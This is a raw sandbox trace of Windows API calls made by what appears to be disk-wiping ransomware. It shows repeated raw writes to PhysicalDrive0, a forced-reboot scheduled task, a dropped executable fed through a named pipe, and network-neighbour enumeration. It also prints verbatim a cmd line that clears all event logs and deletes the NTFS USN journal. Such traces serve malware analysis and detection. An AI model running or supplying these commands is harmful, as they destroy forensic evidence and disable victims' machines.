lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.412] CloseHandle (hObject=0x13c) returned 1 [0035.412] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.413] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0xa00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.413] WriteFile (in: hFile=0x13c, lpBuffer=0x535d28*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x535d28*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.414] CloseHandle (hObject=0x13c) returned 1 [0035.414] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.415] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0xc00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.415] WriteFile (in: hFile=0x13c, lpBuffer=0x535f28*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x535f28*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.415] CloseHandle (hObject=0x13c) returned 1 [0035.416] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.416] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0xe00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.416] WriteFile (in: hFile=0x13c, lpBuffer=0x536128*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x536128*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.417] CloseHandle (hObject=0x13c) returned 1 [0035.417] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.418] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x1000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.418] WriteFile (in: hFile=0x13c, lpBuffer=0x536328*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x536328*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.419] CloseHandle (hObject=0x13c) returned 1 [0035.419] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.419] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x1200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.419] WriteFile (in: hFile=0x13c, lpBuffer=0x536528*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x536528*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.420] CloseHandle (hObject=0x13c) returned 1 [0035.420] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.421] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x1400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.421] WriteFile (in: hFile=0x13c, lpBuffer=0x536728*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x536728*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.425] CloseHandle (hObject=0x13c) returned 1 [0035.426] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.426] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x1600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.426] WriteFile (in: hFile=0x13c, lpBuffer=0x536928*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x536928*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.427] CloseHandle (hObject=0x13c) returned 1 [0035.427] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.428] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x1800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.428] WriteFile (in: hFile=0x13c, lpBuffer=0x536b28*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x536b28*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.429] CloseHandle (hObject=0x13c) returned 1 [0035.429] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.429] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x1a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.429] WriteFile (in: hFile=0x13c, lpBuffer=0x536d28*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x536d28*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.430] CloseHandle (hObject=0x13c) returned 1 [0035.430] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.431] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x1c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.431] WriteFile (in: hFile=0x13c, lpBuffer=0x536f28*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x536f28*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.432] CloseHandle (hObject=0x13c) returned 1 [0035.432] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.432] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x1e00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.432] WriteFile (in: hFile=0x13c, lpBuffer=0x537128*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x537128*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.433] CloseHandle (hObject=0x13c) returned 1 [0035.433] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.434] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x2000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.434] WriteFile (in: hFile=0x13c, lpBuffer=0x537328*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x537328*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.435] CloseHandle (hObject=0x13c) returned 1 [0035.435] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.436] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x2200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.436] WriteFile (in: hFile=0x13c, lpBuffer=0x537528*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x537528*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.436] CloseHandle (hObject=0x13c) returned 1 [0035.437] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.437] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x2400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.437] WriteFile (in: hFile=0x13c, lpBuffer=0x537728*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x537728*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.438] CloseHandle (hObject=0x13c) returned 1 [0035.438] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.439] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x4000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.439] WriteFile (in: hFile=0x13c, lpBuffer=0x3c5e58*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x3c5e58*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.439] CloseHandle (hObject=0x13c) returned 1 [0035.440] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.440] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x4200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.440] WriteFile (in: hFile=0x13c, lpBuffer=0x3c5858*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x3c5858*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.441] CloseHandle (hObject=0x13c) returned 1 [0035.441] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.442] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x4400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.442] WriteFile (in: hFile=0x13c, lpBuffer=0x3c5a58*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x3c5a58*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.442] CloseHandle (hObject=0x13c) returned 1 [0035.443] GetLocalTime (in: lpSystemTime=0x3c6214 | out: lpSystemTime=0x3c6214*(wYear=0x7e1, wMonth=0x6, wDayOfWeek=0x5, wDay=0x1e, wHour=0x11, wMinute=0x2, wSecond=0xa, wMilliseconds=0x329)) [0035.443] GetTickCount () returned 0x10646 [0035.443] GetSystemDirectoryW (in: lpBuffer=0x3c5bfc, uSize=0x30c | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.443] PathAppendW (in: pszPath="C:\\Windows\\system32", pMore="shutdown.exe /r /f" | out: pszPath="C:\\Windows\\system32\\shutdown.exe /r /f") returned 1 [0035.443] GetVersionExW (in: lpVersionInformation=0x3c52d4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3c52d4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0035.443] wsprintfW (in: param_1=0x3c53fc, param_2="schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%02d" | out: param_1="schtasks /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 17:15") returned 87 [0035.444] wsprintfW (in: param_1=0x3c4578, param_2="/c %ws" | out: param_1="/c schtasks /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 17:15") returned 90 [0035.444] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x3c4d78, nSize=0x30c | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.444] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c schtasks /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 17:15", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x3c5390*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3c53d4 | out: lpCommandLine="/c schtasks /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 17:15", lpProcessInformation=0x3c53d4*(hProcess=0x140, hThread=0x13c, dwProcessId=0x960, dwThreadId=0x964)) returned 1 [0035.537] Sleep (dwMilliseconds=0x0) [0035.592] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xe7c10, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14c [0035.593] GetCurrentProcess () returned 0xffffffff [0035.593] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74e70000 [0035.594] GetProcAddress (hModule=0x74e70000, lpProcName="IsWow64Process") returned 0x74e8195e [0035.594] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x3c6214 | out: Wow64Process=0x3c6214) returned 1 [0035.594] FindResourceW (hModule=0xe0000, lpName=0x2, lpType=0xa) returned 0x1000b8 [0035.594] LoadResource (hModule=0xe0000, hResInfo=0x1000b8) returned 0x106268 [0035.594] LockResource (hResData=0x106268) returned 0x106268 [0035.594] SizeofResource (hModule=0xe0000, hResInfo=0x1000b8) returned 0x6b22 [0035.595] GetTempPathW (in: nBufferLength=0x208, lpBuffer=0x3c5784 | out: lpBuffer="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\") returned 0x25 [0035.595] GetTempFileNameW (in: lpPathName="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x3c5b94 | out: lpTempFileName="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp" (normalized: "c:\\users\\hjrd1k~1\\appdata\\local\\temp\\6b4.tmp")) returned 0x6b4 [0035.597] CoCreateGuid (in: pguid=0x3c6200 | out: pguid=0x3c6200*(Data1=0xd32ab4e, Data2=0x3bee, Data3=0x44d4, Data4=([0]=0xa8, [1]=0xcc, [2]=0x67, [3]=0x33, [4]=0x1e, [5]=0x9e, [6]=0x7f, [7]=0x80))) returned 0x0 [0035.598] StringFromCLSID (in: rclsid=0x3c6200*(Data1=0xd32ab4e, Data2=0x3bee, Data3=0x44d4, Data4=([0]=0xa8, [1]=0xcc, [2]=0x67, [3]=0x33, [4]=0x1e, [5]=0x9e, [6]=0x7f, [7]=0x80)), lplpsz=0x3c6218 | out: lplpsz=0x3c6218*="{0D32AB4E-3BEE-44D4-A8CC-67331E9E7F80}") returned 0x0 [0035.599] CreateFileW (lpFileName="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp" (normalized: "c:\\users\\hjrd1k~1\\appdata\\local\\temp\\6b4.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0x148 [0035.599] WriteFile (in: hFile=0x148, lpBuffer=0x539f48*, nNumberOfBytesToWrite=0xdc00, lpNumberOfBytesWritten=0x3c4770, lpOverlapped=0x0 | out: lpBuffer=0x539f48*, lpNumberOfBytesWritten=0x3c4770*=0xdc00, lpOverlapped=0x0) returned 1 [0035.601] CloseHandle (hObject=0x148) returned 1 [0035.603] wsprintfW (in: param_1=0x3c4f84, param_2="\\\\.\\pipe\\%ws" | out: param_1="\\\\.\\pipe\\{0D32AB4E-3BEE-44D4-A8CC-67331E9E7F80}") returned 47 [0035.603] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xe73fd, lpParameter=0x3c4f84, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x148 [0035.604] wsprintfW (in: param_1=0x3c4784, param_2="\"%ws\" %ws" | out: param_1="\"C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp\" \\\\.\\pipe\\{0D32AB4E-3BEE-44D4-A8CC-67331E9E7F80}") returned 94 [0035.604] CreateProcessW (in: lpApplicationName="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp", lpCommandLine="\"C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp\" \\\\.\\pipe\\{0D32AB4E-3BEE-44D4-A8CC-67331E9E7F80}", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x3c61ac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3c61f0 | out: lpCommandLine="\"C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp\" \\\\.\\pipe\\{0D32AB4E-3BEE-44D4-A8CC-67331E9E7F80}", lpProcessInformation=0x3c61f0*(hProcess=0x158, hThread=0x154, dwProcessId=0x970, dwThreadId=0x974)) returned 1 [0035.614] WaitForSingleObject (hHandle=0x158, dwMilliseconds=0xea60) returned 0x0 [0039.207] TerminateThread (hThread=0x148, dwExitCode=0x0) returned 1 [0039.208] CloseHandle (hObject=0x148) returned 1 [0039.208] CreateFileW (lpFileName="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp" (normalized: "c:\\users\\hjrd1k~1\\appdata\\local\\temp\\6b4.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0x148 [0039.209] WriteFile (in: hFile=0x148, lpBuffer=0x539f48*, nNumberOfBytesToWrite=0xdc00, lpNumberOfBytesWritten=0x3c4770, lpOverlapped=0x0 | out: lpBuffer=0x539f48*, lpNumberOfBytesWritten=0x3c4770*=0xdc00, lpOverlapped=0x0) returned 1 [0039.211] CloseHandle (hObject=0x148) returned 1 [0039.213] DeleteFileW (lpFileName="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp" (normalized: "c:\\users\\hjrd1k~1\\appdata\\local\\temp\\6b4.tmp")) returned 1 [0039.217] CoTaskMemFree (pv=0x532870) [0039.217] FindResourceW (hModule=0xe0000, lpName=0x3, lpType=0xa) returned 0x1000c8 [0039.218] LoadResource (hModule=0xe0000, hResInfo=0x1000c8) returned 0x10cd8c [0039.218] LockResource (hResData=0x10cd8c) returned 0x10cd8c [0039.218] SizeofResource (hModule=0xe0000, hResInfo=0x1000c8) returned 0x2ec75 [0039.228] GetWindowsDirectoryW (in: lpBuffer=0x557a80, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0039.228] PathAppendW (in: pszPath="C:\\Windows", pMore="dllhost.dat" | out: pszPath="C:\\Windows\\dllhost.dat") returned 1 [0039.228] CreateFileW (lpFileName="C:\\Windows\\dllhost.dat" (normalized: "c:\\windows\\dllhost.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0039.229] WriteFile (in: hFile=0x148, lpBuffer=0x1050048*, nNumberOfBytesToWrite=0x5d378, lpNumberOfBytesWritten=0x3c6200, lpOverlapped=0x0 | out: lpBuffer=0x1050048*, lpNumberOfBytesWritten=0x3c6200*=0x5d378, lpOverlapped=0x0) returned 1 [0039.235] CloseHandle (hObject=0x148) returned 1 [0039.253] SetLastError (dwErrCode=0x0) [0039.253] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xea0fe, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x148 [0039.254] GetTickCount () returned 0x10d48 [0039.254] NetServerGetInfo (in: servername=0x0, level=0x65, bufptr=0x3c6210 | out: bufptr=0x3c6210) returned 0x0 [0039.255] NetApiBufferFree (Buffer=0x554388) returned 0x0 [0039.255] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xea274, lpParameter=0x4f14c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c0 [0039.256] Sleep (dwMilliseconds=0x0) [0039.309] GetLogicalDrives () returned 0x4 [0039.309] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.309] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x551ba8 [0039.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xe1e51, lpParameter=0x551ba8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.311] Sleep (dwMilliseconds=0x0) [0039.361] Sleep (dwMilliseconds=0xea60) [0050.974] wsprintfW (in: param_1=0x3ca238, param_2="wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:" | out: param_1="wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:") returned 120 [0050.974] wsprintfW (in: param_1=0x3c53b4, param_2="/c %ws" | out: param_1="/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:") returned 123 [0050.974] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x3c5bb4, nSize=0x30c | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0050.974] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x3c61cc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3c6210 | out: lpCommandLine="/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:", lpProcessInformation=0x3c6210*(hProcess=0x1ec, hThread=0x1e8, dwProcessId=0x9d0, dwThreadId=0x9d4)) returned 1 [0050.993] Sleep (dwMilliseconds=0xbb8) [0054.604] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x772b0000 [0054.604] GetProcAddress (hModule=0x772b0000, lpProcName="NtRaiseHardError") returned 0x772d15f4 [0054.605] NtRaiseHardError (ErrorStatus=0xc0000350, NumberOfParameters=0x0, UnicodeStringParameterMask=0x0, Parameters=0x0, ValidResponseOptions=0x6, Response=0x3cac60) Thread: id = 2 os_tid = 0x950 Thread: id = 4 os_tid = 0x968 [0035.621] StrCmpIW (psz1="127.0.0.1", psz2="localhost") returned -1 [0035.621] GetComputerNameExW (in: NameType=0x4, lpBuffer=0xf4f828, nSize=0xf4fa30 | out: lpBuffer="1R6PFH", nSize=0xf4fa30) returned 1 [0035.621] StrCmpIW (psz1="127.0.0.1", psz2="1R6PFH") returned -1 [0035.621] StrCmpIW (psz1="localhost", psz2="1R6PFH") returned 1 [0035.621] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xe8e7f, lpParameter=0x48dd58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x160 [0035.622] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x74cb0000 [0035.623] GetProcAddress (hModule=0x74cb0000, lpProcName="GetExtendedTcpTable") returned 0x74cc1a8a [0035.623] GetExtendedTcpTable (in: pTcpTable=0x10a0020, pdwSize=0xf4f808, bOrder=0, ulAf=0x2, TableClass=0x1, Reserved=0x0 | out: pTcpTable=0x10a0020, pdwSize=0xf4f808) returned 0x0 [0035.624] FreeLibrary (hLibModule=0x74cb0000) returned 1 [0035.625] GetIpNetTable (in: IpNetTable=0x0, SizePointer=0xf4f80c, Order=0 | out: IpNetTable=0x0, SizePointer=0xf4f80c) returned 0x7a [0035.625] GetIpNetTable (in: IpNetTable=0x537b40, SizePointer=0xf4f80c, Order=0 | out: IpNetTable=0x537b40, SizePointer=0xf4f80c) returned 0x0 [0035.626] wsprintfW (in: param_1=0xf4f7bc, param_2="%u.%u.%u.%u" | out: param_1="192.168.0.1") returned 11 [0035.626] StrCmpIW (psz1="127.0.0.1", psz2="192.168.0.1") returned -1 [0035.626] StrCmpIW (psz1="localhost", psz2="192.168.0.1") returned 1 [0035.626] 